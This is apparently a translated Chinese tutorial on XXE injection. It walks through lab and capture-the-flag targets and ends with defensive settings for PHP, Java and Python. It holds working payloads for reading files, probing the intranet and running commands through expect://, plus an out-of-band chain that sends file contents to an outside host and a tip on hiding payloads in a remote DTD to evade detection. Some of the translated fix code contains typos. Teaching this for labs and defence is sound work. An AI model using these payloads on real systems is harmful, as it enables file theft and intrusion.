Directory
-
- Involving cases
-
- pikachu shooting range xml data transmission test-echo, gameplay, protocol, introduction
- How to play – read files
- How to play – Intranet probe or attack intranet application (trigger vulnerability address)
- How to play-RCE
- Introduce external entity dtd
- No echo – reading file
- Protocol – Read File (Bypass)
- xxe-lab shooting range login box xml data transmission test-detection discovery
- CTF-Jarvis-OJ-Web-XXE Security Real Question Reproduction-Data Request Format
- xxe security vulnerability automated injection script tool-XXEinjector (Ruby)
- CTF-Vulnhub-XXE Security Real Question Reproduction-Detection, Utilization, Expansion, and Practical Combat
- xxe vulnerability repair and defense solution-php, java, python-filtering and disabling
Article sharing: https://www.cnblogs.com/zhengna/p/15740341.html
XML is designed to transmit and store data. The XML document structure includes XML declarations, DTD document type definitions (optional), and document elements. Its focus is the content of the data. It separates the data from HTML and is information independent of software and hardware. transfer tool. The full name of the XXE vulnerability is XML External Entity Injection, which is an xml external entity injection vulnerability. The XXE vulnerability occurs when the application parses XML input and does not prohibit the loading of external entities. As a result, malicious external files can be loaded, causing file reading, command execution, and intranet failure. Port scanning, attacking intranet websites and other hazards. The harm is somewhat similar to the harm of ssrf vulnerability
Key differences between XML and HTML
XML is designed to transport and store data, with the focus being the content of the data.
HTML was designed to display data, with the focus being on the appearance of the data.
HTML is designed to display information, while XML is designed to transmit information.
<!--XML declaration--> <?xml version="1.0"?> <!--Document type definition--> <!DOCTYPE note [ <!--Define this document to be a note type document--> <!ELEMENT note (to,from,heading,body)> <!--define the note element to have four elements--> <!ELEMENT to (#PCDATA)> <!--Define the to element as the "#PCDATA" type--> <!ELEMENT from (#PCDATA)> <!--Define the from element as the "#PCDATA" type--> <!ELEMENT head (#PCDATA)> <!--Define the head element as the "#PCDATA" type--> <!ELEMENT body (#PCDATA)> <!--Define the body element as the "#PCDATA" type--> ]]]> <!--Document elements--> <note> <to>Dave</to> <from>Tom</from> <head>Reminder</head> <body>You are a good man</body> </note>
#DTD
Document type definitions (DTDs) define legal building blocks for XML documents
It uses a series of legal elements to define the structure of the document
A DTD can be declared in an XML document as a line or as an external reference
(1) Internal DOCTYPE statement
(2)External document statement
#DTDEntity
(1) Internal entity declaration
(2)External entity declaration
(3) Parameter entity declaration
Involved cases
Pikachu shooting range xml data transmission test-echo, gameplay, protocol, introduction
How to play – read files
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d://test.txt">
]>
<x> &xxe;</x>
How to play-Intranet probe or attack intranet application (trigger vulnerability address)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo {<!-- -->
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt"
>
]>
<x> &rabbit;</x>
How to play-RCE
This CASE is to execute system commands in the PHP environment where the expect extension is installed.
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id">
]>
<x> &xxe;</x>
In actual combat situations, this situation is difficult to encounter, and orders cannot be executed.
Introducing external entity dtd
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
%file;
]>
<x>&send;</x>
evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/test.txt">
If the other party allows external entities, then it can call the remote entity to execute the relevant attack code. This is similar to the concept of local inclusion and remote inclusion when we talk about file inclusion. This kind of reference external entity dtd file , in fact, it is similar to the principle of remote inclusion of vulnerabilities
Custom attack code is used to bypass some remote defense codes. If the other party has detection and defense software, it will track user behavior and find that you are reading this file. It will intercept it or analyze it in the code. If there is a key protocol name or something conceptual, it may be intercepted. In this case, put your core code on it, and this payload will remotely request and execute the core code.
The application scenario is to bypass and carry out customized attacks. When you want to attack, just change the dtd file.
No echo – read file
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY %dtd SYSTEM "http://192.168.0.103:8081/test.dtd">
%dtd;
%send;
]>
test.dtd:
<!ENTITY % payload
"<!ENTITY % send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
>
%payload;
Without echo, we don’t know what you read, so this attack is meaningless.
The file variable reads the specified content. After reading, it will be copied to file and the code in the dtd will be executed.
Protocol-Read File (Bypass)
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]> <x> &f;</x>
There are many dictionaries on the Internet about the payload of xxe attacks.
xxe-lab shooting range login box xml data transmission test-detection discovery
1. The submitted data contains XML format such as:
admin
2. The request header includes:
Content-Type: text/xml or Content-type:application/xml <?xml version="1.0"?> <!DOCTYPE Mikasa [ <!ENTITY test SYSTEM "file:///d:/test.txt"> ]> <user><username> & amp;test;</username><password>Mikasa</password>< /user>
The xxe scanning tool is also available online, but I haven’t tried the effect.
Mainly through crawling data packets, we use BP to capture packets, and there is a function of crawling data packets on bp. We can let bp help us crawl the entire website and crawl all address requests. After crawling, we can crawl every Perform a batch search in the data package and search for the Content-Type value. If text/xml or application/xml is found in this value, it means that the subsequent data is all data transmission in the XML format language. At this time It is in line with the reception of xml language. At this time, you can try the vulnerability.
According to the format of the transmitted data, the writing method of this format is the writing method of typical XML language code.
Blind guess, no does not mean that it is received. It may be displayed normally in the code, but it just means that the data packet is not displayed normally. At this time, you can try to change the type to text/xml or application/xml. Then write the attack statement to the data to test whether there are xxe vulnerabilities. This is a conventional operation to test whether there are vulnerabilities and whether they exist based on manual methods.
Crawl the website
This writing method is a typical XML writing method. It is consistent with testing the existence of xxe vulnerabilities. At this time, we attack it and just copy the payload directly.
Find the data packet that matches the existence of the vulnerability. Here we submit the data and submit our own payload for attack.
After he submits the data to the above, his data transmission form is submitted in the form of json. This is a blind guess. Guess if you have, we directly modify the Content-Type type, because you do not modify the data package. For this type, this writing method will not be recognized when transmitting data.
CTF-Jarvis-OJ-Web-XXE Security Real Question Reproduction-Data Request Format
http://web.jarvisoj.com:9882/
Change request data format: application/xml
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x> &f;</x>
Change the data format to the payload format. The method mentioned before is to first determine whether it conforms to the XML format. If it does, we are determining whether it has this vulnerability, so the two concepts are different.
Change data packets to achieve blind guessing of xxe vulnerabilities
xxe security vulnerability automated injection script tool-XXEinjector (Ruby)
How to use XXEinjector: https://www.cnblogs.com/bmjoker/p/9614990.html
XXEinjector detection tool: https://github.com/enjoiz/XXEinjector
https://www.cnblogs.com/bmjokex/p/9614990.html
xxe_payload_fuzz
From discovering the target address to collecting the target’s assets, attacking the target’s asset information, and finding the corresponding vulnerabilities to implement step-by-step operations.
CTF-Vulnhub-XXE Security Real Question Reproduction-Detection, Utilization, Expansion, and Practical Combat
Scan IP and port->Scan probe directory->Packet capture probe xxe security->Use xxe to read source code->flag points to the file->base32 64 unpack->php run->flag
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT Y ANY> <!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]> <root><name> & amp;sp;</name><password>hj</password></root>
The overall difficulty of the target drone is still a bit high. It won’t just find a loophole and exploit it. It will give you some detours in the middle.
xxe vulnerability repair and defense solution-php, java, python-filtering and disabling
#Option 1 – Disable external entities
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
Python:
from Ixml import etreexmlData =etree.parse(xmlsource,etree,XMLParser(resolve _entities=False))
#Option 2-Filter XML data submitted by users
Filter keywords:
The root cause of the XXE vulnerability is that the website receives xml data. XML is actually language. The website receives xml data, but it does not filter it, so we can let it receive some xml code. This code is to execute the file to read this The operation is actually based on the injection we talked about, json injection and deserialization, which are all data format issues.